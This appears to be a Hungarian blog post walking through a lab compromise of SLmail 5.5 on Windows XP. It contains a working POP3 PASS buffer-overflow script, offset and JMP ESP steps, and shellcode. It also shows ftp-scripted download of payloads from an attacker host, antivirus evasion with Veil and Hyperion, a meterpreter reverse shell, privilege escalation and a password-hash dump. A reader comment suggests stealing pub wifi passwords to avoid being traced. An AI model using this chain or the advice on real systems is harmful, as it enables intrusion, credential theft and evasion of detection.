2014. január 23., csütörtök
SLmail exploit
1st step download this : http://www.offensive-security.com/pwbonline/extrabos.tar.gz
2nd step : install the slmail application to XP machine
netstat -naob
Protokoll Helyi cím Idegen cím Állapot PID
TCP 0.0.0.0:25 0.0.0.0:0 FIGYEL 1944
[slsmtp.exe]
TCP 0.0.0.0:79 0.0.0.0:0 FIGYEL 2376
[SLmail.exe]
TCP 0.0.0.0:106 0.0.0.0:0 FIGYEL 2376
[SLmail.exe]
TCP 0.0.0.0:110 0.0.0.0:0 FIGYEL 2376
[SLmail.exe]
...
TCP 0.0.0.0:180 0.0.0.0:0 FIGYEL 1840
[SLadmin.exe]
...
TCP 127.0.0.1:8376 0.0.0.0:0 FIGYEL 2376
[SLmail.exe]
...
UDP 0.0.0.0:50 *:* 2376
[SLmail.exe]
UDP 0.0.0.0:54 *:* 2376
[SLmail.exe]
...
root@kali:~# unicornscan -mT 192.168.56.105
TCP open smtp[ 25] from 192.168.56.105 ttl 128
TCP open finger[ 79] from 192.168.56.105 ttl 128
TCP open 3com-tsmux[ 106] from 192.168.56.105 ttl 128
TCP open pop3[ 110] from 192.168.56.105 ttl 128
TCP open epmap[ 135] from 192.168.56.105 ttl 128
TCP open netbios-ssn[ 139] from 192.168.56.105 ttl 128
TCP open microsoft-ds[ 445] from 192.168.56.105 ttl 128
TCP open unknown[ 8081] from 192.168.56.105 ttl 128
root@kali:~# nmap -sV -A 192.168.56.105 -pT:25,79,106,110,180
25/tcp open smtp SLmail smtpd 5.5.0.4433
| smtp-commands: xxxxx-30298B2AD.com, SIZE 100000000, SEND, SOML, SAML, HELP, VRFY, EXPN, ETRN, XTRN,
|_ This server supports the following commands. HELO MAIL RCPT DATA RSET SEND SOML SAML HELP NOOP QUIT
79/tcp open finger SLMail fingerd
|_finger: Finger online user list request denied.
106/tcp open pop3pw SLMail pop3pw
110/tcp open pop3 BVRP Software SLMAIL pop3d
180/tcp open ris?
root@kali:~# nc 192.168.56.105 25
220 xxxxx-30298B2AD.com SMTP Server SLmail 5.5.0.4433 Ready ESMTP spoken here
HELO my
250 xxxxx-30298B2AD.com
HELP
214-This server supports the following commands.
214-HELO MAIL RCPT DATA RSET
214-SEND SOML SAML HELP NOOP
214 QUIT
QUIT
221 xxxxx-30298B2AD.com Service closing transmission channel
root@kali:~# nc 192.168.56.105 79
?
Unable to find specified user.
root@kali:~# nc 192.168.56.105 106
200 hello
help
500 protocol error
?
500 protocol error
quit
200 bye
root@kali:~# nc 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00005.988109@xxxxx-30298B2AD.com>
HELP
-ERR unknown command
?
-ERR unknown command
QUIT
+OK POP3 server xxxxx-30298B2AD.com signing off.
root@kali:~# nc 192.168.56.105 180
?
HELP
QUIT
^C
http://www.exploit-db.com/exploits/638/
root@kali:~# searchsploit slmail
Description Path
--------------------------------------------------------------------------- -------------------------
SLMail 5.5 POP3 PASS Buffer Overflow Exploit /windows/remote/638.py
SLMAIL 5.5 POP3 PASS - Remote Buffer Overflow Exploit /windows/remote/643.c
SLMail 5.5 - Remote Buffer Overflow Exploit /windows/remote/646.c
root@kali:~# cat slmail_buf.py
import sys
import struct
import socket
from time import sleep
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
buffer = 'A'*2000
s.connect((sys.argv[1],int(sys.argv[2])))
data=s.recv(1024)
print data
s.send('USER user\r\n')
data=s.recv(1024)
print data
s.send('PASS '+buffer+'\r\n')
data=s.recv(1024)
print data
s.close()
ollydbg Attach SLMAIL.exe
root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00006.1554953@xxxxx-30298B2AD.com>
+OK user welcome here
-ERR unable to lock mailbox
buffer = 'A'*5000
root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00007.1647656@xxxxx-30298B2AD.com>
+OK user welcome here
^CTraceback (most recent call last):
File "slmail_buf.py", line 16, in <module>
data=s.recv(1024)
KeyboardInterrupt
ESP 01BFA154 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 41414141
EIP 41414141
root@kali:~# /usr/share/metasploit-framework/tools/pattern_create.rb 5000
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3A...
buffer = 'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa...
root@kali:~# python slmail_buf.py 192.168.56.105 110
ESP 01BFA154 ASCII "2Fz3Fz4Fz5Fz6Fz7Fz8Fz9Ga0Ga1Ga2Ga3Ga4Ga5Ga6Ga7Ga8Ga9Gb0Gb1Gb2Gb3Gb4Gb5Gb6Gb7Gb8Gb9Gc0Gc1Gc2Gc3Gc4Gc5Gc6Gc7Gc8Gc9Gd0Gd1Gd2Gd3Gd4Gd5Gd6Gd7Gd8Gd9Ge0Ge1Ge2Ge3Ge4Ge5Ge6Ge7Ge8Ge9Gf0Gf1Gf2Gf3Gf4Gf5Gf6Gf7Gf8Gf9Gg0Gg1Gg2Gg3Gg4Gg5Gg6Gg7Gg8Gg9Gh
EBP 46307A46
EIP 7A46317A
root@kali:~# /usr/share/metasploit-framework/tools/pattern_offset.rb 7A46317A
[*] Exact match at offset 4654
root@kali:~# /usr/share/metasploit-framework/tools/pattern_offset.rb 2Fz3
[*] Exact match at offset 4658
ollydbg Search JMP ESP
7C91FCD8 FFE4 JMP ESP
root@kali:~# msfpayload windows/shell_bind_tcp RPORT=4444 R | msfencode -a x86 -b '\x00\x0a\x0d' -t python
[*] x86/shikata_ga_nai succeeded with size 368 (iteration=1)
buf = ""
buf += "\xdb\xd2\xb8\xb3\xb6\xb4\xe1\xd9\x74\x24\xf4\x5f\x2b"
buf += "\xc9\xb1\x56\x31\x47\x18\x03\x47\x18\x83\xc7\xb7\x54"
buf += "\x41\x1d\x5f\x11\xaa\xde\x9f\x42\x22\x3b\xae\x50\x50"
...
buffer = '\x41' * 4654 + '\xD8\xFC\x91\x7C' + '\x90'*32 + buf
root@kali:~# python slmail_buf.py 192.168.56.105 110
+OK POP3 server xxxxx-30298B2AD.com ready <00001.6738453@xxxxx-30298B2AD.com>
+OK user welcome here
root@kali:~# nc 192.168.56.105 4444
Microsoft Windows XP [verzi�sz�m: 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\Program Files\SLmailSystem>
Next Step : Bypass the AV & privilege escalation.
C:\Program Files\SLmail\System>tftp -i 192.168.56.101 GET nc.exe
tftp -i 192.168.56.101 GET nc.exe
A hozz�f�r�s megtagadva.
AV log:
2014.01.24. 09:46:38 Blocked by Access Protection rule NT AUTHORITY\SYSTEM C:\WINDOWS\system32\cmd.exe C:\WINDOWS\system32\tftp.exe Anti-virus Standard Protection:Prevent use of tftp.exe Action blocked : Read
C:\Program Files\SLmail\System>echo open 192.168.56.101 21> ftp.txt
echo open 192.168.56.101 21> ftp.txt
C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt
C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt
C:\Program Files\SLmail\System>echo bin>>ftp.txt
echo bin>>ftp.txt
C:\Program Files\SLmail\System>echo GET nc.exe>>ftp.txt
echo GET nc.exe>>ftp.txt
C:\Program Files\SLmail\System>echo bye>>ftp.txt
echo bye>>ftp.txt
C:\Program Files\SLmail\System>ftp -s:ftp.txt
ftp -s:ftp.txt
Felhaszn�l� (192.168.56.101:(none)): open 192.168.56.101 21
bin
GET nc.exe
bye
C:\Program Files\SLmail\System>dir
dir
A meghajt�ban (C) l�v� k�tet xp_system.
A k�tet sorozatsz�ma: 6C1F-E27C
C:\Program Files\SLmail\System tartalma:
2014.01.24. 09:48 <DIR> .
2014.01.24. 09:48 <DIR> ..
2014.01.24. 09:47 56 ftp.txt
2002.11.19. 11:40 3�358 listrcrd.txt
2014.01.23. 09:24 1�898 maillog.000
2014.01.24. 00:00 51�104 maillog.001
2014.01.24. 09:33 6�141 maillog.txt
5 f�jl 62�557 b�jt
2 k�nyvt�r 30�726�782�976 b�jt szabad
C:\Program Files\SLmail\System>
AV log:
2014.01.24. 9:48:12 Deleted NT AUTHORITY\SYSTEM C:\WINDOWS\system32\ftp.exe C:\Program Files\SLmail\System\nc.exe Tool-NetCat (Potentially Unwanted Program)
Generate a payload16.exe with Veil.
C:\Program Files\SLmail\System>echo open 192.168.56.101 21>ftp.txt
echo open 192.168.56.101 21>ftp.txt
C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt
C:\Program Files\SLmail\System>echo ftp>>ftp.txt
echo ftp>>ftp.txt
C:\Program Files\SLmail\System>echo bin>>ftp.txt
echo bin>>ftp.txt
C:\Program Files\SLmail\System>echo GET payload16.exe>>ftp.txt
echo GET payload16.exe>>ftp.txt
C:\Program Files\SLmail\System>echo bye>>ftp.txt
echo bye>>ftp.txt
C:\Program Files\SLmail\System>ftp -s:ftp.txt
ftp -s:ftp.txt
Felhaszn�l� (192.168.56.101:(none)): open 192.168.56.101 21
bin
GET payload16.exe
bye
C:\Program Files\SLmail\System>dir
dir
A meghajt�ban (C) l�v� k�tet xp_system.
A k�tet sorozatsz�ma: 6C1F-E27C
C:\Program Files\SLmail\System tartalma:
2014.01.24. 10:27 <DIR> .
2014.01.24. 10:27 <DIR> ..
2014.01.24. 10:27 63 ftp.txt
2002.11.19. 11:40 3�358 listrcrd.txt
2014.01.23. 09:24 1�898 maillog.000
2014.01.24. 00:00 51�104 maillog.001
2014.01.24. 10:03 6�309 maillog.txt
2014.01.24. 10:27 3�059�256 payload16.exe
6 f�jl 3�121�988 b�jt
2 k�nyvt�r 30�723�756�032 b�jt szabad
C:\Program Files\SLmail\System>
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.56.101
LHOST => 192.168.56.101
msf exploit(handler) > set LPORT 443
LPORT => 443
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j -z
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.56.101:443
[*] Starting the payload handler...
C:\Program Files\SLmail\System>payload16.exe
payload16.exe
msf exploit(handler) >
[*] Sending stage (770048 bytes) to 192.168.56.105
[*] Meterpreter session 1 opened (192.168.56.101:443 -> 192.168.56.105:3089) at 2014-01-24 10:56:18 +0100
sessions -l
Active sessions
===============
Id Type Information Connection
-- ---- ----------- ----------
1 meterpreter x86/win32 NT AUTHORITY\SYSTEM @ xxxxx-30298B2AD 192.168.56.101:443 -> 192.168.56.105:3089 (192.168.56.105)
msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter > sysinfo
Computer : xxxxx-30298B2AD
OS : Windows XP (Build 2600, Szervizcsomag 3).
Architecture : x86
System Language : hu_HU
Meterpreter : x86/win32
meterpreter >
meterpreter > ps
Process List
============
PID PPID Name Arch Session User Path
--- ---- ---- ---- ------- ---- ----
0 0 [System Process] 4294967295
4 0 System x86 0 NT AUTHORITY\SYSTEM
188 2012 explorer.exe x86 0 xxxxx-30298B2AD\Admin C:\WINDOWS\Explorer.EXE
300 1600 cmd.exe x86 0 NT AUTHORITY\SYSTEM C:\WINDOWS\system32\cmd.exe
...
532 848 FrameworkService.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\McAfee\Common Framework\FrameworkService.exe
580 848 VsTskMgr.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\McAfee\VirusScan Enterprise\VsTskMgr.exe
644 2476 McTray.exe x86 0 xxxxx-30298B2AD\Admin C:\Program Files\McAfee\Common Framework\McTray.exe
712 644 shstat.exe x86 0 xxxxx-30298B2AD\Admin C:\Program Files\McAfee\VirusScan Enterprise\SHSTAT.EXE
744 848 mdm.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\Microsoft Shared\VS7Debug\mdm.exe
752 580 mfeann.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\McAfee\VirusScan Enterprise\mfeann.exe
...
C:\WINDOWS\system32\mfevtps.exe
976 3676 payload16.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SLmail\System\payload16.exe
...
1840 848 SLadmin.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SLadmin\SLadmin.exe
1944 848 SLSmtp.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SLmail\slsmtp.exe
...
2100 300 nc.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\SLmail\System\nc.exe
2136 848 mcshield.exe x86 0 NT AUTHORITY\SYSTEM C:\Program Files\Common Files\McAfee\SystemCore\mcshield.exe
meterpreter >
I encrypted the nc.exe too.... :
root@kali:~/Hyperion-1.0# wine crypter.exe nc.exe nc_crypt.exe
Opening nc.exe
Copied file to memory: 0x117358
Found valid MZ signature
Found pointer to PE Header: 0xd8
Found valid PE signature
Found a PE32 file
Number of Data Directories: 16
Image Base: 0x400000
...
Starting FASM with the following parameters:
Commandline: Fasm\FASM.EXE Src\FasmContainer32\main.asm nc_crypt.exe
FASM Working Directory: Z:\root\Hyperion-1.0
Executing fasm.exe
The AV bypassed...
meterpreter > getsystem
...got system (via technique 1).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > hashdump
Admin:1022:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:::
ASPNET:1004:275b6f5ffbf7997723474a13bebfa08d:738da873863e137c2e75504e6a8b4ca5:::
Rendszergazda:1005:aad3b435b51404eeaad3b435b51404ee:6f3961367d2b4d1f55f14af59f34cd45:::
Seg�ts�gny�jt�:1021:b3c85a07a2fc61530574f646d69db64a:2e82f56f50cfaa7347b018126bcad628:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:bf0859717440c82b18e3f5cb36db8211:::
user:1023:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
Vend�g:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter >
Game OVER.
Feliratkozás:
Megjegyzések küldése (Atom)
Szia! Nagyon szuper blog!
VálaszTörlésPrivátban szeretnék tőled egy kis segítséget kérni C# programozásban. :-)
email:jack-spaero[@]freemail.hu
Ezzel vége a TOR-nak:
VálaszTörléshttp://pcforum.hu/hirek/15785/Megszerezte+az+FBI+az+osszes+a+Tor-on+keresztul+elkuldott+levelet.html
http://pcforum.hu/hirek/15313/Konnyuszerrel+azonosithatok+a+Tor-t+hasznalo+internetezok.html
1. Ip cím elrejtésére a TOR mellett számos más lehetőség van.
VálaszTörlés2. nyilvános Net kávézó vagy publikus WiFi , esetleg eldobható mobile stick + TOR és ... sok sikert a beazonosítási kísérletekhez...
3. anomym email küldésre vannak más szolgáltatások amiket direkt erre hoztak létre...
4. TOR-t általában azért használ valaki, hogy : a FORRÁS oldalon rejtse a forgalmat. A CÉL oldalon történő rejtőzéshez vannak ettől jobb módszerek.
Magyarul a TOR arra való, hogy az ISP-d le lássa, hogy mit csinálsz milyen oldalakat látogatsz, stb. A private VPN-ek is erre valók. Ahhoz, hogy a cél oldalon ne lehessen lenyomozni a forrást, nem a TOR a legjobb, hanem az ellenőrizhetetlen forrás-ok alkalmazása (nyilvános wifi-k használata, kocsmák wifi jelszavának megszerzése, anonym proxy-kkal való kombinálása, satöbbi...)